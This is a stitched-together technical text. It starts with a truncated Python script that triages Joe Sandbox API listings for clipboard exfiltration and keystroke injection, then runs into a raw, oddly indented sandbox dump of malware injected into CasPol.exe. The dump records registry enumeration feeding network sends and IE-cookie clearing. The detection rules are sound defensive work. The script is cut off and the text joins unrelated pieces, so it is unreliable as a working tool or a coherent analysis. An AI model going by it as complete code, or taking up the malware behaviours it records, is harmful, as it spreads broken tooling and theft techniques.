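# Clipboard format constants from winuser.h: CF_TEXT = 1, CF_UNICODETEXT = 13 (0x0D).
CF_TEXT, CF_UNICODETEXT = 0x01, 0x0D

# Constructed sample: the three function entries from this page, trimmed to their API lines.
SAMPLE_REPORT = """\
APIs
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Memory Dump Source
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
APIs
• _free.LIBCMT ref: 00447EBC
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
Memory Dump Source
"""

# One bullet line: optional 'Part of subcall function XXXX:' prefix, Api.MODULE, optional
# parenthesized args, then 'ref: <address>'. The analyzer writes '?' for unrecovered args.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# APIs that move bytes off the host; assumed list, extend as needed.
SEND_APIS = {"send", "WSASend", "InternetWriteFile", "HttpSendRequestA", "HttpSendRequestW"}


def parse_functions(report: str):
    """Split the listing at each 'APIs' header; return one dict of calls per function."""
    functions, current = [], None
    for line in report.splitlines():
        if line.strip() == "APIs":
            current = {"calls": []}
            functions.append(current)
            continue
        m = API_LINE.search(line)
        if current is None or not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current["calls"].append({"api": m["api"], "module": m["mod"], "args": args,
                                 "ref": m["ref"], "via_subcall": m["sub"]})
    return functions


def _as_int(arg):
    """Hex argument to int; None when the analyzer could not recover it ('?')."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def classify(func):
    """Map a function's call set onto capability tags (assumed names)."""
    names = {c["api"] for c in func["calls"]}
    tags = set()
    reads_clip = "OpenClipboard" in names and "GetClipboardData" in names
    # First argument of GetClipboardData is the clipboard format being requested.
    formats = {_as_int(c["args"][0]) for c in func["calls"]
               if c["api"] == "GetClipboardData" and c["args"]}
    if reads_clip and formats & {CF_TEXT, CF_UNICODETEXT}:
        tags.add("clipboard_text_read")
    # Clipboard read and a network send reachable from the same function: exfiltration.
    if reads_clip and names & SEND_APIS:
        tags.add("clipboard_exfil")
    # SendInput together with MapVirtualKey: synthesizing keystrokes into the session.
    if "SendInput" in names and names & {"MapVirtualKeyA", "MapVirtualKeyW"}:
        tags.add("keystroke_injection")
    return tags


def triage(report: str):
    """Return [(address of first call, sorted tags)] for every function that fired a rule."""
    hits = []
    for f in parse_functions(report):
        tags = classify(f)
        if tags:
            hits.append((f["calls"][0]["ref"], sorted(tags)))
    return hits


if __name__ == "__main__":
    for ref, tags in triage(SAMPLE_REPORT):
        print(f"function near {ref}: {', '.join(tags)}")
```

The third entry (CRT `_free` and `GetTimeZoneInformation`) produces no tag, which is the point of clustering on call sets rather than on single APIs: a lone `OpenClipboard` or `send` is benign, the combination in one function is not. Subcall lines are folded into the parent function because that is where the report attributes them.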
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00447EBC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00447EE0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448233
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                                                                                                                  • Opcode ID: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                                                                                                                  • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                  • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444086
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044409D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440BC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID: J7D
                                                                                                                                                                                                                                  • API String ID: 3033488037-1677391033
                                                                                                                                                                                                                                  • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                  • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,04579C07,?,00000000,?,00000000,00000000), ref: 045794D4
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0457954F
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0457956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 04579590
• WriteFile.KERNEL32(?,?,00000000,04579C07,00000000,?,?,?,?,?,?,?,?,?,04579C07,?), ref: 045795AF
• WriteFile.KERNEL32(?,?,00000001,04579C07,00000000,?,?,?,?,?,?,?,?,?,04579C07,?), ref: 045795E8
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
• __fassign.LIBCMT ref: 0044A180
• __fassign.LIBCMT ref: 0044A19B
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
• WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
• WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: HE$HE
• API String ID: 269201875-1978648262
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1001AE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1001A6E8
• __fassign.LIBCMT ref: 1001A763
• __fassign.LIBCMT ref: 1001A77E
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1001A7A4
• WriteFile.KERNEL32(?,FF8BC35D,00000000,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7C3
• WriteFile.KERNEL32(?,?,00000001,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7FC
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
• RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: TUFTUF$>G$DG$DG
• API String ID: 3114080316-344394840
APIs
• _ValidateLocalCookies.LIBCMT ref: 0457339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 045733A3
• _ValidateLocalCookies.LIBCMT ref: 04573431
• __IsNonwritableInCurrentImage.LIBCMT ref: 0457345C
• _ValidateLocalCookies.LIBCMT ref: 045734B1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 4d5d8015348562e82703a527721b1f3523adbcd1c5d48b0d2f45946a094fac82
                                                                                                                                                                                                                                  • Instruction ID: 81fc5039f8285a63032545adfcd60c85de7eb0138d4d6b599b66c23253e8deea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d5d8015348562e82703a527721b1f3523adbcd1c5d48b0d2f45946a094fac82
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8941C534A00209ABCF14DF68F848A9EBBB6BF85338F148175DC156B251D735BA05FB91

APIs
• _ValidateLocalCookies.LIBCMT ref: 00437AAB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
• _ValidateLocalCookies.LIBCMT ref: 00437B41
• __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
• _ValidateLocalCookies.LIBCMT ref: 00437BC1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
• Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
• Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
• Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95

APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: edc7f370fecb03e9ccacb381159a67de1c7764de54bec237b8e337eb7ab9e290
• Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
• Opcode Fuzzy Hash: edc7f370fecb03e9ccacb381159a67de1c7764de54bec237b8e337eb7ab9e290
• Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE

Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
• Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
• Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
• Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: P[G
• API String ID: 2536120697-571123470
• Opcode ID: 9dc93271d8ca2c5a2fe1f23905a31ea5d19b989abd63f293402e2a51e6b4ac0b
• Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
• Opcode Fuzzy Hash: 9dc93271d8ca2c5a2fe1f23905a31ea5d19b989abd63f293402e2a51e6b4ac0b
• Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D

APIs
  • Part of subcall function 04579221: _free.LIBCMT ref: 0457924A
• _free.LIBCMT ref: 045792AB
  • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
  • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
• _free.LIBCMT ref: 045792B6
• _free.LIBCMT ref: 045792C1
• _free.LIBCMT ref: 04579315
• _free.LIBCMT ref: 04579320
• _free.LIBCMT ref: 0457932B
• _free.LIBCMT ref: 04579336
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: ad69e43a333624a25dd69832a9a1e29a9781904b3395b89d8b447dc564ba5229
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: DE1172B1650709FAF520F7B0EC45FCBBB9DBF84708F400838A79A76052DA24B5046661
APIs
  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
• _free.LIBCMT ref: 0044FD29
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 0044FD34
• _free.LIBCMT ref: 0044FD3F
• _free.LIBCMT ref: 0044FD93
• _free.LIBCMT ref: 0044FD9E
• _free.LIBCMT ref: 0044FDA9
• _free.LIBCMT ref: 0044FDB4
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
• Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
• Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
• Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
APIs
  • Part of subcall function 1001CCFE: _free.LIBCMT ref: 1001CD27
• _free.LIBCMT ref: 1001CD88
  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
• _free.LIBCMT ref: 1001CD93
• _free.LIBCMT ref: 1001CD9E
• _free.LIBCMT ref: 1001CDF2
• _free.LIBCMT ref: 1001CDFD
• _free.LIBCMT ref: 1001CE08
• _free.LIBCMT ref: 1001CE13
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
• Instruction ID: 240818be63ccc3dc83c97ca6d82296bdbd890e81bd7557c088d8b4c1d65aa4e5
• Opcode Fuzzy Hash: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
• Instruction Fuzzy Hash: 8C112C75540B08EAD520EBB0CC46FCB779DDF04B00F880D1DB69D6E052DA79F9859B91
APIs
• GetLastError.KERNEL32(?,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000CFB0
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1000CFBE
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000CFD7
• SetLastError.KERNEL32(00000000,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000D029
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
• Instruction ID: 42fd6e2f6c8fd24065b669452523f428359482c8d7ddecb3c68a8dbe90369287
• Opcode Fuzzy Hash: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
• Instruction Fuzzy Hash: 6E012836609B2A6EF31197749CC9F2B26D8DB457F1B30022AF928850F8FE115C475150
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
